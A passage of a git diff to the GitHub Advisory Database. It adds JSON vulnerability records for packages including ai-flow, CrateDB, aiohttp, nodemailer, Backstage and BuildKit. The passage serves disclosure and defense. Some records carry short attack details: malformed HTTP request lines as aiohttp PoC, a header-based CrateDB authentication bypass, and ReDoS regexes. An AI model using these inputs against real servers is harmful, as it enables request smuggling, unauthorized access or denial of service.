"2024-01-31T23:14:25Z", + "nvd_published_at": "2021-02-02T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-7j98-74jh-cjxh/GHSA-7j98-74jh-cjxh.json b/advisories/github-reviewed/2024/01/GHSA-7j98-74jh-cjxh/GHSA-7j98-74jh-cjxh.json index 172eae6fc3ae0..1ca15e1d8bbd5 100644 --- a/advisories/github-reviewed/2024/01/GHSA-7j98-74jh-cjxh/GHSA-7j98-74jh-cjxh.json +++ b/advisories/github-reviewed/2024/01/GHSA-7j98-74jh-cjxh/GHSA-7j98-74jh-cjxh.json @@ -60,6 +60,10 @@ "type": "PACKAGE", "url": "https://github.com/xsuchy/templated-dictionary" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NBFYREAJH4T7GXXQZ4GJEREN4Q3AHS3K/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/16/1" diff --git a/advisories/github-reviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json b/advisories/github-reviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json new file mode 100644 index 0000000000000..d31b296fac250 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json @@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mgg-3rq2-hff4", + "modified": "2024-02-02T18:10:22Z", + "published": "2024-01-27T12:30:25Z", + "aliases": [ + "CVE-2024-0960" + ], + "summary": "ai-flow Deserialization of Untrusted Data vulnerability", + "details": "A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file `\\ai_flow\\cli\\commands\\workflow_command.py`. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ai-flow" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.3.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0960" + }, + { + "type": "WEB", + "url": "https://github.com/bayuncao/vul-cve-8" + }, + { + "type": "WEB", + "url": "https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl" + }, + { + "type": "PACKAGE", + "url": "https://github.com/flink-extended/ai-flow" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252205" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252205" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:10:22Z", + "nvd_published_at": "2024-01-27T12:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-7mgx-gvjw-m3w3/GHSA-7mgx-gvjw-m3w3.json b/advisories/github-reviewed/2024/01/GHSA-7mgx-gvjw-m3w3/GHSA-7mgx-gvjw-m3w3.json new file mode 100644 index 0000000000000..d0cbf302654f5 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-7mgx-gvjw-m3w3/GHSA-7mgx-gvjw-m3w3.json @@ -0,0 +1,142 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mgx-gvjw-m3w3", + "modified": "2024-01-31T12:37:36Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-51982" + ], + "summary": "CrateDB authentication bypass vulnerability", + "details": "CrateDB 5.5.1 is contains an authentication bypass vulnerability in the Admin UI component. After configuring password authentication and_ Local_ In the case of an address, identity authentication can be bypassed by setting the X-Real IP request header to a specific value and accessing the Admin UI directly using the default user identity.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.2.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.3.0" + }, + { + "fixed": "5.3.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.4.0" + }, + { + "fixed": "5.4.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.5.0" + }, + { + "fixed": "5.5.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51982" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/issues/15231" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/pull/15234" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/0c166ef083bec4d64dd55c1d8cb9b3dec350d241" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/5be7b3864137c23305ece10df3f7c311ee50ae4d" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/b8b4cec49a1c7eb2b5af568400bd571d194dc03e" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/da59311ca920743ebc58ee64c29cfe5723487f56" + }, + { + "type": "PACKAGE", + "url": "https://github.com/crate/crate" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/crate/PYSEC-2024-27.yaml" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:43:26Z", + "nvd_published_at": "2024-01-30T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-7xm8-wjq7-88r5/GHSA-7xm8-wjq7-88r5.json b/advisories/github-reviewed/2024/01/GHSA-7xm8-wjq7-88r5/GHSA-7xm8-wjq7-88r5.json new file mode 100644 index 0000000000000..f6d860faa5560 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-7xm8-wjq7-88r5/GHSA-7xm8-wjq7-88r5.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7xm8-wjq7-88r5", + "modified": "2024-02-06T20:29:19Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-51839" + ], + "summary": "DeviceFarmer stf uses DES-ECB", + "details": "DeviceFarmer stf v3.6.6 suffers from Use of a Broken or Risky Cryptographic Algorithm.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@devicefarmer/stf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.6.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51839" + }, + { + "type": "WEB", + "url": "https://github.com/DeviceFarmer/stf/issues/736" + }, + { + "type": "PACKAGE", + "url": "https://github.com/DeviceFarmer/stf" + }, + { + "type": "WEB", + "url": "https://github.com/DeviceFarmer/stf/blob/a6b5f18941d0de5929f9c24c3ce3e9c13317a653/lib/util/vncauth.js#L35" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51839.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:29:19Z", + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json b/advisories/github-reviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json new file mode 100644 index 0000000000000..a3851dcfd5146 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json @@ -0,0 +1,82 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86rg-pf4c-5grg", + "modified": "2024-02-05T17:59:41Z", + "published": "2024-01-04T12:30:20Z", + "aliases": [ + "CVE-2023-6944" + ], + "summary": "@backstage/backend-app-api leaks GitLab access tokens", + "details": "A flaw was found in the Red Hat Developer Hub (RHDH). The catalog-import function leaks GitLab access tokens on the frontend when the base64 encoded GitLab token includes a newline at the end of the string. The sanitized error can display on the frontend, including the raw access token. Upon gaining access to this token and depending on permissions, an attacker could push malicious code to repositories, delete resources in Git, revoke or generate new keys, and sign code illegitimately.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@backstage/backend-app-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.5.9-next.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6944" + }, + { + "type": "WEB", + "url": "https://github.com/backstage/backstage/issues/21503" + }, + { + "type": "WEB", + "url": "https://github.com/backstage/backstage/pull/21582" + }, + { + "type": "WEB", + "url": "https://github.com/backstage/backstage/commit/0382db60f6c8e8715a702bde6408ad10a48d8e11" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6944" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255204" + }, + { + "type": "PACKAGE", + "url": "https://github.com/backstage/backstage" + }, + { + "type": "WEB", + "url": "https://github.com/backstage/backstage/blob/master/docs/releases/v1.21.0-next.2-changelog.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-209" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:59:41Z", + "nvd_published_at": "2024-01-04T10:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json b/advisories/github-reviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json new file mode 100644 index 0000000000000..ab381d2d8edbb --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json @@ -0,0 +1,85 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8j3x-w35r-rw4r", + "modified": "2024-01-31T22:38:58Z", + "published": "2024-01-25T21:32:14Z", + "aliases": [ + "CVE-2023-6267" + ], + "summary": "Quarkus Improper Handling of Insufficient Permissions or Privileges and Improper Handling of Exceptional Conditions vulnerability", + "details": "A flaw was found in the json payload. If annotation based security is used to secure a REST resource, the JSON body that the resource may consume is being processed (deserialized) prior to the security constraints being evaluated and applied. This does not happen with configuration based security.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.quarkus.resteasy.reactive:resteasy-reactive" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.13.9.Final" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.quarkus.resteasy.reactive:resteasy-reactive" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0.Final" + }, + { + "fixed": "3.2.9.Final" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6267" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6267" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2251155" + }, + { + "type": "PACKAGE", + "url": "https://github.com/quarkusio/quarkus" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-280", + "CWE-755" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:38:58Z", + "nvd_published_at": "2024-01-25T19:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-8qpw-xqxj-h4r2/GHSA-8qpw-xqxj-h4r2.json b/advisories/github-reviewed/2024/01/GHSA-8qpw-xqxj-h4r2/GHSA-8qpw-xqxj-h4r2.json new file mode 100644 index 0000000000000..ad729797cc557 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-8qpw-xqxj-h4r2/GHSA-8qpw-xqxj-h4r2.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8qpw-xqxj-h4r2", + "modified": "2024-02-06T22:12:06Z", + "published": "2024-01-29T22:30:07Z", + "aliases": [ + "CVE-2024-23829" + ], + "summary": "aiohttp's HTTP parser (the python one, not llhttp) still overly lenient about separators", + "details": "### Summary\nSecurity-sensitive parts of the *Python HTTP parser* retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input.\n\n### Details\nThese problems are rooted in pattern matching protocol elements, previously improved by PR #3235 and GHSA-gfw2-4jvh-wgfg:\n\n1. The expression `HTTP/(\\d).(\\d)` lacked another backslash to clarify that the separator should be a literal dot, not just *any* Unicode code point (result: `HTTP/(\\d)\\.(\\d)`).\n\n2. The HTTP version was permitting Unicode digits, where only ASCII digits are standards-compliant.\n\n3. Distinct regular expressions for validating HTTP Method and Header field names were used - though both should (at least) apply the common restrictions of rfc9110 `token`.\n\n### PoC\n`GET / HTTP/1ö1`\n`GET / HTTP/1.𝟙`\n`GET/: HTTP/1.1`\n`Content-Encoding?: chunked`\n\n### Impact\nPrimarily concerns running an aiohttp server without llhttp:\n 1. **behind a proxy**: Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling.\n 2. **directly accessible** or exposed behind proxies relaying malformed input: the unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8074/files", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "aiohttp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.9.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8qpw-xqxj-h4r2" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-gfw2-4jvh-wgfg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23829" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/3235" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/8074" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/8074/files" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/commit/33ccdfb0a12690af5bb49bda2319ec0907fa7827" + }, + { + "type": "PACKAGE", + "url": "https://github.com/aio-libs/aiohttp" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2024-26.yaml" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-444" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:30:07Z", + "nvd_published_at": "2024-01-29T23:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-8r93-59cf-358f/GHSA-8r93-59cf-358f.json b/advisories/github-reviewed/2024/01/GHSA-8r93-59cf-358f/GHSA-8r93-59cf-358f.json index f9d5579c724e5..8406d5a82396e 100644 --- a/advisories/github-reviewed/2024/01/GHSA-8r93-59cf-358f/GHSA-8r93-59cf-358f.json +++ b/advisories/github-reviewed/2024/01/GHSA-8r93-59cf-358f/GHSA-8r93-59cf-358f.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8r93-59cf-358f", - "modified": "2024-01-24T21:50:26Z", + "modified": "2024-01-31T21:46:14Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23902" ], "summary": "CSRF vulnerability in Jenkins GitLab Branch Source Plugin", - "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier allows attackers to connect to an attacker-specified URL.", + "details": "Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier does not require POST requests for a form validation endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.\n\nThis vulnerability allows attackers to connect to an attacker-specified URL.\n\nGitLab Branch Source Plugin 688.v5fa_356ee8520 requires POST requests for the affected form validation endpoint.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-8xw6-9h78-c89j/GHSA-8xw6-9h78-c89j.json b/advisories/github-reviewed/2024/01/GHSA-8xw6-9h78-c89j/GHSA-8xw6-9h78-c89j.json new file mode 100644 index 0000000000000..d93e2b70684bb --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-8xw6-9h78-c89j/GHSA-8xw6-9h78-c89j.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xw6-9h78-c89j", + "modified": "2024-02-05T21:04:52Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-51837" + ], + "summary": "Ylianst MeshCentral Missing SSL Certificate Validation", + "details": "Ylianst MeshCentral 1.1.16 is vulnerable to Missing SSL Certificate Validation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "meshcentral" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.1.16" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51837" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Ylianst/MeshCentral" + }, + { + "type": "WEB", + "url": "https://github.com/Ylianst/MeshCentral/blob/master/mpsserver.js" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/Bug_MeshCentral.md" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51837.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:44:28Z", + "nvd_published_at": "2024-01-30T01:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-997g-27x8-43rf/GHSA-997g-27x8-43rf.json b/advisories/github-reviewed/2024/01/GHSA-997g-27x8-43rf/GHSA-997g-27x8-43rf.json new file mode 100644 index 0000000000000..4d97682c8619a --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-997g-27x8-43rf/GHSA-997g-27x8-43rf.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-997g-27x8-43rf", + "modified": "2024-01-30T21:34:04Z", + "published": "2024-01-30T20:57:22Z", + "aliases": [ + "CVE-2024-24558" + ], + "summary": "react-query-streamed-hydration Cross-site Scripting vulnerability", + "details": "### Impact\n\nThe `@tanstack/react-query-next-experimental` NPM package is vulnerable to a cross-site scripting vulnerability. To exploit this, an attacker would need to either inject malicious input or arrange to have malicious input be returned from an endpoint.\n\nThis vulnerability arises from improper handling of untrusted input when `@tanstack/react-query-next-experimental` performs server-side rendering of HTML pages. To fix this vulnerability, we implemented appropriate escaping to prevent javascript injection into rendered pages.\n\n### Patches\n\nTo fix this issue, please update to version 5.18.0 or later.\n\n### Workarounds\n\nThere are no known workarounds for this issue. Please update to version 5.18.0 or later.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@tanstack/react-query-next-experimental" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.18.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/TanStack/query/security/advisories/GHSA-997g-27x8-43rf" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24558" + }, + { + "type": "WEB", + "url": "https://github.com/TanStack/query/commit/f2ddaf2536e8b71d2da88a9310ac9a48c13512a1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TanStack/query" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:57:22Z", + "nvd_published_at": "2024-01-30T20:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-9f9p-cp3c-72jf/GHSA-9f9p-cp3c-72jf.json b/advisories/github-reviewed/2024/01/GHSA-9f9p-cp3c-72jf/GHSA-9f9p-cp3c-72jf.json index 27be8ce0c944d..4f72e4fdb8833 100644 --- a/advisories/github-reviewed/2024/01/GHSA-9f9p-cp3c-72jf/GHSA-9f9p-cp3c-72jf.json +++ b/advisories/github-reviewed/2024/01/GHSA-9f9p-cp3c-72jf/GHSA-9f9p-cp3c-72jf.json @@ -86,7 +86,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-113" + "CWE-113", + "CWE-436" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json b/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json new file mode 100644 index 0000000000000..5e46639db3f2a --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json @@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9h6g-pr28-7cqp", + "modified": "2024-01-31T22:42:54Z", + "published": "2024-01-31T22:42:54Z", + "aliases": [ + + ], + "summary": "nodemailer ReDoS when trying to send a specially crafted email", + "details": "### Summary\nA ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter `attachDataUrls` set, causing the stuck of event loop. \nAnother flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop. \n\n### Details\n\nRegex: /^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/\n\nPath: compile -> getAttachments -> _processDataUrl\n\nRegex: /(]* src\\s*=[\\s\"']*)(data:([^;]+);[^\"'>\\s]+)/\n\nPath: _convertDataImages\n\n### PoC\n\nhttps://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6\nhttps://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698\n\n### Impact\n\nReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "nodemailer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.9.9" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.9.8" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-9h6g-pr28-7cqp" + }, + { + "type": "WEB", + "url": "https://github.com/nodemailer/nodemailer/commit/dd8f5e8a4ddc99992e31df76bcff9c590035cd4a" + }, + { + "type": "WEB", + "url": "https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6" + }, + { + "type": "WEB", + "url": "https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698" + }, + { + "type": "PACKAGE", + "url": "https://github.com/nodemailer/nodemailer" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1333" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:42:54Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-9p26-698r-w4hx/GHSA-9p26-698r-w4hx.json b/advisories/github-reviewed/2024/01/GHSA-9p26-698r-w4hx/GHSA-9p26-698r-w4hx.json new file mode 100644 index 0000000000000..e5940363132e3 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-9p26-698r-w4hx/GHSA-9p26-698r-w4hx.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9p26-698r-w4hx", + "modified": "2024-02-01T17:48:10Z", + "published": "2024-01-31T22:43:54Z", + "aliases": [ + "CVE-2024-23650" + ], + "summary": "BuildKit vulnerable to possible panic when incorrect parameters sent from frontend", + "details": "### Impact\nA malicious BuildKit client or frontend could craft a request that could lead to BuildKit daemon crashing with a panic.\n\n### Patches\nThe issue has been fixed in v0.12.5\n\n### Workarounds\nAvoid using BuildKit frontends from untrusted sources. A frontend image is usually specified as the `#syntax` line on your Dockerfile, or with `--frontend` flag when using `buildctl build` command. \n\n### References\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/buildkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.12.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/security/advisories/GHSA-9p26-698r-w4hx" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23650" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/pull/4601" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moby/buildkit" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/releases/tag/v0.12.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-754" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:43:54Z", + "nvd_published_at": "2024-01-31T22:15:53Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-9xc9-xq7w-vpcr/GHSA-9xc9-xq7w-vpcr.json b/advisories/github-reviewed/2024/01/GHSA-9xc9-xq7w-vpcr/GHSA-9xc9-xq7w-vpcr.json new file mode 100644 index 0000000000000..e1197d816f105 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-9xc9-xq7w-vpcr/GHSA-9xc9-xq7w-vpcr.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xc9-xq7w-vpcr", + "modified": "2024-01-31T22:43:09Z", + "published": "2024-01-31T09:30:18Z", + "aliases": [ + "CVE-2023-44313" + ], + "summary": "Apache ServiceComb Service-Center Server-Side Request Forgery vulnerability", + "details": "Server-Side Request Forgery (SSRF) vulnerability in Apache ServiceComb Service-Center. Attackers can obtain sensitive server information through specially crafted requests.This issue affects Apache ServiceComb before 2.1.0 (included). Users are recommended to upgrade to version 2.2.0, which fixes the issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/apache/servicecomb-service-center" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44313" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/servicecomb-service-center" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/kxovd455o9h4f2v811hcov2qknbwld5r" + }, + { + "type": "WEB", + "url": 